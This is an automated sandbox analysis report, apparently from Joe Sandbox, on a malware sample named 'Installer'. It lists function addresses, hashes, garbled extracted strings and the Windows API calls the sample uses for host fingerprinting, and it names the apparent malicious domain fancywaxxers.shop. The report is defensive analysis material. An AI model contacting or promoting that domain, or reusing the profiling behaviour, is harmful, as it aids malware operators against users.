API String ID: 237503144-2729952446
Opcode ID: ec5c5c38ab9fffbfb462dae7f2305f9fe11cb4ff9aca71e97a5880e0c58aee11
Instruction ID: 4c2c877a7502ecb994cb0758218946ddc79209b00efc6af2b020780c94e1ecca
Opcode Fuzzy Hash: ec5c5c38ab9fffbfb462dae7f2305f9fe11cb4ff9aca71e97a5880e0c58aee11
Instruction Fuzzy Hash: 08129AB564C3008BE318DF65D89176FBBE1EFC5308F09892DE5958B391D778C6098B8A

Function 00412BE0 Relevance: 12.9, APIs: 3, Strings: 3, Instructions: 2382COMMON

Download Yara Rule

Strings

=<, xrefs: 00414284
D, xrefs: 00414A8B
`, xrefs: 00413DB5

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: =<$D$`
API String ID: 0-4189016937
Opcode ID: f97235cd33df9153f77dcd854faf4133f454f993d5d2a842fff3847dbb694d49
Instruction ID: 731aceeec7928a5a15e291f49b080e69f7c6e20b825ce8e3401e3ca08f7f39c9
Opcode Fuzzy Hash: f97235cd33df9153f77dcd854faf4133f454f993d5d2a842fff3847dbb694d49
Instruction Fuzzy Hash: E82308B19087508FDB10DF38C84539EBFB1AF56314F1886ADD4999B3C2D33A8946CB96

Function 0041616F Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 456
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 004162B2
6GvA, xrefs: 0041674A
t, xrefs: 0041655D
}K8E, xrefs: 004167C6
f=}A, xrefs: 0041668F
{=}A, xrefs: 00416661

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: 6GvA$8$f=}A$t${=}A$}K8E
API String ID: 0-3658233549
Opcode ID: 559b996744da1928a81c6229e3d9645c69db8ea194df3f8f11a67e7340051c94
Instruction ID: f57b88b56a5fac5bab7b421b29fad489c1a86a820d89d1678ba1913164da0a8a
Opcode Fuzzy Hash: 559b996744da1928a81c6229e3d9645c69db8ea194df3f8f11a67e7340051c94
Instruction Fuzzy Hash: 31F1EEB5808380CBD7309F29D8417AFB7E1AF85318F15892DE4D98B391E738C845CB96

Function 00432966 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00432A55

Strings

U[, xrefs: 00432A69
$zHj, xrefs: 00432BFF
$zHj, xrefs: 00432AF5, 00432B06

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: $zHj$$zHj$U[
API String ID: 3960555810-3960599755
Opcode ID: ccf4977113bc0272a9bbb5aa863de691a5640479251674104b33aa3d40b8948b
Instruction ID: e898b6ec9e2f582d5203131d955863ad5cd10cd9096e30cc577c524aff65642d
Opcode Fuzzy Hash: ccf4977113bc0272a9bbb5aa863de691a5640479251674104b33aa3d40b8948b
Instruction Fuzzy Hash: 7091C87050C3C28BD729CF2985643ABFFE09FA6304F18996ED0D997382D7798509CB5A

Function 0043106C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00432A55

Strings

U[, xrefs: 00432A69
$zHj, xrefs: 00432BFF
$zHj, xrefs: 00432AF5, 00432B06

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: $zHj$$zHj$U[
API String ID: 3960555810-3960599755
Opcode ID: dc2a5ea8a171d2e6f320be4aa6f922a167b636e6c3786419a56d058c4e8331bf
Instruction ID: 03959202a7d11621b6482fe75cf5f17d138a098bfe3add340976dca21e35ddc4
Opcode Fuzzy Hash: dc2a5ea8a171d2e6f320be4aa6f922a167b636e6c3786419a56d058c4e8331bf
Instruction Fuzzy Hash: BD91B77050C3C28BD729CF2985643ABFFE09FA6304F18996ED0D997382D7798509CB5A

Function 00438BA0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00438BE9
GetSystemMetrics.USER32 ref: 00438BF9

Strings

, xrefs: 00438CE6

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 7868b1fa4b48e3dc46f3c58aaaabf8417f46a90a5193d35dde22761d3ce01745
Instruction ID: 87970b4418385b1810ea9a0bcc05a066424d9b6ef7f241e2c7cc89dcb4301590
Opcode Fuzzy Hash: 7868b1fa4b48e3dc46f3c58aaaabf8417f46a90a5193d35dde22761d3ce01745
Instruction Fuzzy Hash: 3E8141B4509384CFE764DF29C54879BBBE0BB85308F00892EE6998B350D7B99848DF57

Function 0040D7E3 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00438BA0: GetSystemMetrics.USER32 ref: 00438BE9
Part of subcall function 00438BA0: GetSystemMetrics.USER32 ref: 00438BF9

CoUninitialize.COMBASE ref: 0040D7F3

Strings

fancywaxxers.shop, xrefs: 0040DBFF
~|, xrefs: 0040DAD6

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: MetricsSystem$Uninitialize
String ID: fancywaxxers.shop$~|
API String ID: 1128523136-1994482202
Opcode ID: df00f939683beeb75b4a581e6e18bf65a0a2f8efcf1f8aeccd3817b2af9f921c
Instruction ID: 8d7de68b7d80a0030baf1307b40fc1016aec9e8eacc5fef0c70409fd4b8b26e5
Opcode Fuzzy Hash: df00f939683beeb75b4a581e6e18bf65a0a2f8efcf1f8aeccd3817b2af9f921c
Instruction Fuzzy Hash: 8BB1F4B0645B818FD319CF29C450762BFA1BF56304F1881ADD0D69FB92C37AA41ACF94

Function 00442EE0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(004462CB,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00442F0E

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 004453C0 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

@, xrefs: 00445428

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 3f7944b18a0800c3187d721f9976486022bbdcc9f921b1e09efba1c18e9e2880
Instruction ID: e703506dfcaec7a2c8858511a3d33288f4c32cb0d73a20600dfa015e0f0534c2
Opcode Fuzzy Hash: 3f7944b18a0800c3187d721f9976486022bbdcc9f921b1e09efba1c18e9e2880
Instruction Fuzzy Hash: 6221F2714047049BE714DF58C8C166BB7F5FF85324F10962DE9A80B3D1D3799848CB9A

Function 00408A70 Relevance: 7.6, APIs: 5, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408A93
GetCurrentThreadId.KERNEL32 ref: 00408A99
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408AAA
GetForegroundWindow.USER32 ref: 00408AB0
ExitProcess.KERNEL32 ref: 00408C23

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: eb62f9e4f25ecd0e179c3f372f1044eb7c435c738a8590a262607f4bb5a465c0
Instruction ID: 413b317225a84424b2dfe47e832f51202893a73063c6cb0015ddf05c1a04ecce
Opcode Fuzzy Hash: eb62f9e4f25ecd0e179c3f372f1044eb7c435c738a8590a262607f4bb5a465c0
Instruction Fuzzy Hash: E2416C767002105BE714AF658D067873BA29FC2704F09817EB9C4BB2D7CA7C880AC79A

Function 00431A9A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000005,#GSx,00000100), ref: 00431BAD

Strings

#GSx, xrefs: 00431B65

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: ComputerName
String ID: #GSx
API String ID: 3545744682-694072080
Opcode ID: f0d9e221b2c973bb04a82bc9e131ec18d005f3ca7eb06de30fd543fa903c5f91
Instruction ID: 1fbbda13d8de4bbeb02b48e461134a2828c343a88cbda409c2570fa6ae02ce44
Opcode Fuzzy Hash: f0d9e221b2c973bb04a82bc9e131ec18d005f3ca7eb06de30fd543fa903c5f91
Instruction Fuzzy Hash: CD2105751093D08EDB358F25C4683BBBBE19B87314F18599EC0CA9B295CB784109C757

Function 00431A98 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,#GSx,00000100), ref: 00431BAD

Strings

#GSx, xrefs: 00431B65

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: ComputerName
String ID: #GSx
API String ID: 3545744682-694072080
Opcode ID: fc19d0a916b5f0f1adabe4f656f18565193d424d1ab80686443998e0c31340a6
Instruction ID: ff0e0186a4c4cb70ebe37e49d348fa53a3ac04ef0fc9050c3353874ef935a0fd
Opcode Fuzzy Hash: fc19d0a916b5f0f1adabe4f656f18565193d424d1ab80686443998e0c31340a6
Instruction Fuzzy Hash: BC2126791093D08ED774CF25C8A83AFBBE1ABC6314F58499EC0CA8B254CB780109CB57

Function 0040F460 Relevance: 3.1, APIs: 2, Instructions: 115COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040F464
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040F5C3

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 745f88851872bf7c0efca4ff766686c74952a8664d4c9b1e1194c8afc0b62544
Instruction ID: 9c1dda7396f0c8c7e6783500787f6eb26bf9002adf6364f84595aac2e64bdeac
Opcode Fuzzy Hash: 745f88851872bf7c0efca4ff766686c74952a8664d4c9b1e1194c8afc0b62544
Instruction Fuzzy Hash: F441C7B4D10B40AFD360BF3D9A0B7537EB4AB01210F504B6DF9E68A6D5E23064298BD7

Function 00443D91 Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00443D91
GetForegroundWindow.USER32 ref: 00443DA2

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: d18c5254ad01d92ae44177861031ce7dab75af7e5d2906294a93b912f313cebf
Instruction ID: abd938e789e1f5187ba8f27d03ccdea6df931b8a3ab6c2b68b8d784ae52e33aa
Opcode Fuzzy Hash: d18c5254ad01d92ae44177861031ce7dab75af7e5d2906294a93b912f313cebf
Instruction Fuzzy Hash: A2D0C7FDE108016BE704D722FD0685B3A56BB873197084579F80283313F5755922999F

Function 0043196A Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 00431A6B

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: c5195203a71ad46910bc62174bbc1b08f9aabb6d14eeee8c8cc610b55570e5b4
Instruction ID: 5c95eb5001701545a662ca63906288a06ca57de69b6a47160be8039b42a167bc
Opcode Fuzzy Hash: c5195203a71ad46910bc62174bbc1b08f9aabb6d14eeee8c8cc610b55570e5b4
Instruction Fuzzy Hash: 3A21C4729193908BD7308F21D8547DBBBE2EBC7308F19856DD488AB681CB394506CB56

Function 0043C9EA Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043CA10

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: f92ee0d49179723a4c415b575fd6d7425ad83723049dc4b0c40a986d85cb20b6
Instruction ID: 63185df653328e29207d98fd0d1d70e5706809a39ea61041b116f1ff020a6d59
Opcode Fuzzy Hash: f92ee0d49179723a4c415b575fd6d7425ad83723049dc4b0c40a986d85cb20b6
Instruction Fuzzy Hash: CD21FD75A0D7988BDB28CB39DC443A97BA26FEA310F1841ECD08A973C1D7344941CB16

Function 00442E80 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B81D,?,00000001,?,?,?), ref: 00442EB2

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4cbdc23b6f7005320daa2566b20a4be3c9b99e86bafe71c2ef7c472ee170f95b
Instruction ID: 564ec381c1cf03e57394b3953e3b8754ec42d7a22ae0bb2ce3b721089a408320
Opcode Fuzzy Hash: 4cbdc23b6f7005320daa2566b20a4be3c9b99e86bafe71c2ef7c472ee170f95b
Instruction Fuzzy Hash: C2E02236528252FBE2012F29BC06B1B3668EFC6765F16083AF40192125DA3AE84185AE

Function 00437044 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0043708D

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 29492cacc2820eea3aa353ac7e20a69d4c768706d433e922e56208bf514576f9
Instruction ID: 5946f706e61eeeced008d4afb13304d670170ba2e4c56f2de3476e01747400e4
Opcode Fuzzy Hash: 29492cacc2820eea3aa353ac7e20a69d4c768706d433e922e56208bf514576f9
Instruction Fuzzy Hash: 31F0BDB4608702CFD314DF24C5A8716BBF0FB89304F10891CE1958B3A0C7B5A948CF82

Function 00441180 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 004411B3

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 68e3ceda1928db0466bc9d4482af9e2af103eb88fb458e712047f6cc809dfa2b
Instruction ID: 46e5d5d69dbae7893f2c2c1b3228b2c5dd662a29d0c611399d6bf6ce31dfc5f1
Opcode Fuzzy Hash: 68e3ceda1928db0466bc9d4482af9e2af103eb88fb458e712047f6cc809dfa2b
Instruction Fuzzy Hash: 4DE0E635519211EFD2502B16BC0AFAB3778EF87732F0644B5F1045B0A1C774D841DBA8

Function 00434F83 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00434FC9

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 850edfbe4f2dd4ef654c5765f171af7cf4f540a6b599b1d90ce24deb63226254
Instruction ID: 2e365f16bd8fe62f9e5b4acee2b841b123b8f3d1210c9501e9702ff544f06981
Opcode Fuzzy Hash: 850edfbe4f2dd4ef654c5765f171af7cf4f540a6b599b1d90ce24deb63226254
Instruction Fuzzy Hash: 35F074B41087018FE311DF28C1A471ABBF4FB85304F10990CE4958B3A0C7B6A949CF82

Function 0040F40B Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040F41D

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 0027893a026d7774d4e4ccbe72e8e94e6c6f08ea811f408759addb1f7edf02e0
Instruction ID: 700d2e8da6baa788b91abee2516e6cd0223368884fbb71ff123e0bb24e0f07e8
Opcode Fuzzy Hash: 0027893a026d7774d4e4ccbe72e8e94e6c6f08ea811f408759addb1f7edf02e0
Instruction Fuzzy Hash: 76D092383D824177F2644B48EC53F102251A302F15F340228B362EE2D0C990B561861D

Function 00441160 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,A9A32DC4,00408B43,4948AF4E), ref: 00441170

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 30fa0d476ea0abc4f4c6b38ed19b560579e410675318e209a31e992a9af234a8
Instruction ID: aa0fcdf3c757321e4212b2b871eb358abbb11b080dde049c23a2622574f2159e
Opcode Fuzzy Hash: 30fa0d476ea0abc4f4c6b38ed19b560579e410675318e209a31e992a9af234a8
Instruction Fuzzy Hash: E7C09B31055120ABD5103B15FC09FC73F54DF45355F1600B5B00867172C760AC41C6D8

Non-executed Functions

Function 0041821B Relevance: 20.4, APIs: 4, Strings: 7, Instructions: 1169COMMON

Download Yara Rule

Strings

%, xrefs: 00419333
Q^, xrefs: 00418781
3^, xrefs: 00418779
L^, xrefs: 00418771
_!*+, xrefs: 0041840F
!*+, xrefs: 00418444
R701, xrefs: 00418979

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: !*+$%$3^$L^$Q^$R701$_!*+
API String ID: 0-105446507
Opcode ID: e6624f7e7aec93fd887a6abbc10595dba6cd25f1f1d10b609a13c871438ab8b3
Instruction ID: 3395ded7384e6ce629f7be012dfe71946915f7b3965d1fb975128a94bafa0119
Opcode Fuzzy Hash: e6624f7e7aec93fd887a6abbc10595dba6cd25f1f1d10b609a13c871438ab8b3
Instruction Fuzzy Hash: DF9202715083418BD324CF28C8917AFBBE1EFD5354F188A2EE4D98B3A1DB788945CB56

Function 0042A430 Relevance: 16.5, Strings: 13, Instructions: 260COMMON

Download Yara Rule

Strings

r6v4, xrefs: 0042AD27
U>e<, xrefs: 0042AD37
P&u$, xrefs: 0042AD07
g*w(, xrefs: 0042AD1F
=N"L, xrefs: 0042AD57
,J>H, xrefs: 0042AD5F
CF*D, xrefs: 0042AD47
k2~0, xrefs: 0042AD2F
IV, xrefs: 0042AD67
\:O8, xrefs: 0042AD3F
h"G , xrefs: 0042AD0F
Q, xrefs: 0042AC31
~.|,, xrefs: 0042AD17

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: ,J>H$=N"L$CF*D$IV$P&u$$Q$U>e<$\:O8$g*w($h"G $k2~0$r6v4$~.|,
API String ID: 0-2646661379
Opcode ID: 387d88b2a45d90ef80da115c3b9cc6ae47730d09904d895ad5a2f579da84e6c4
Instruction ID: c62a59d53872446eb932d95e602be902b561fbade6c64e4fd4862e992d195d58
Opcode Fuzzy Hash: 387d88b2a45d90ef80da115c3b9cc6ae47730d09904d895ad5a2f579da84e6c4
Instruction Fuzzy Hash: 2791AAB56097808BE320CF69D94575BBFE1ABC1708F14492DE9E48B3A2D779C809CB47

Function 0040B3A0 Relevance: 15.3, Strings: 12, Instructions: 258COMMON

Download Yara Rule

Strings

MyI{, xrefs: 0040B570
H-Q/, xrefs: 0040B4B2
2MxO, xrefs: 0040B502
tAC, xrefs: 0040B50C
e]~_, xrefs: 0040B52A
i=k, xrefs: 0040B548
$U*W, xrefs: 0040B53E
nYn[, xrefs: 0040B520
Q)T+, xrefs: 0040B4A8
CqDs, xrefs: 0040B584
TuNw, xrefs: 0040B58E
W!Q#, xrefs: 0040B4BC

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: i=k$$U*W$2MxO$CqDs$H-Q/$MyI{$Q)T+$TuNw$W!Q#$e]~_$nYn[$tAC
API String ID: 0-2382243058
Opcode ID: 511e0f82720be04b41213502e5f85a1a3fe47b65262fe136dd30b7d2e27197d1
Instruction ID: 40ad47a46e4741e89054fc3dba86644fd33e20a32adb9d7331758cbd6b38b3ab
Opcode Fuzzy Hash: 511e0f82720be04b41213502e5f85a1a3fe47b65262fe136dd30b7d2e27197d1
Instruction Fuzzy Hash: ADC164B2640B408FD334CF2AD882797BBE5FB85314F148A2DD5AA8BB90D775A405CF84

Function 0042AF1D Relevance: 12.8, APIs: 2, Strings: 5, Instructions: 592COMMON

Download Yara Rule

Strings

Wuv7, xrefs: 0042B2D2
Do, xrefs: 0042B1A1
,[, xrefs: 0042B191
Y;, xrefs: 0042B199
Wuv7, xrefs: 0042B236, 0042B225

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: ,[$Do$Wuv7$Wuv7$Y;
API String ID: 0-413159385
Opcode ID: 6caba4afda02ce6d07ab335f91660f3d392282794ceef22ce40ec1a987885ac8
Instruction ID: f196387fb257ce98031b4956bc1da16f5a6218d06b9583ec156c39708ef8a687
Opcode Fuzzy Hash: 6caba4afda02ce6d07ab335f91660f3d392282794ceef22ce40ec1a987885ac8
Instruction Fuzzy Hash: 3B1203B5A083148FD7148F28D88172BB7E1FBC9304F49493DE9999B382DB78D805CB86

Function 004094A0 Relevance: 11.7, Strings: 9, Instructions: 450COMMON

Download Yara Rule

Strings

T82F, xrefs: 004094C7
AH@;, xrefs: 004094DF
VU, xrefs: 004096A9
V], xrefs: 004094FF
y, xrefs: 004096B0
<HIC, xrefs: 004094D7
79ih, xrefs: 004098AE
{VT/, xrefs: 004097DE
|, xrefs: 00409859

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: 79ih$<HIC$AH@;$T82F$VU$V]$y${VT/$|
API String ID: 0-516809741
Opcode ID: 7b9032eb4bd35f5e3d99bba0af72f4c1c4d58ce44e2f89bcfce13bf7f176a502
Instruction ID: f2099bf756f496caf09f83fb1d1f0daa8500d5445b22638eadcfb5b6787b15ff
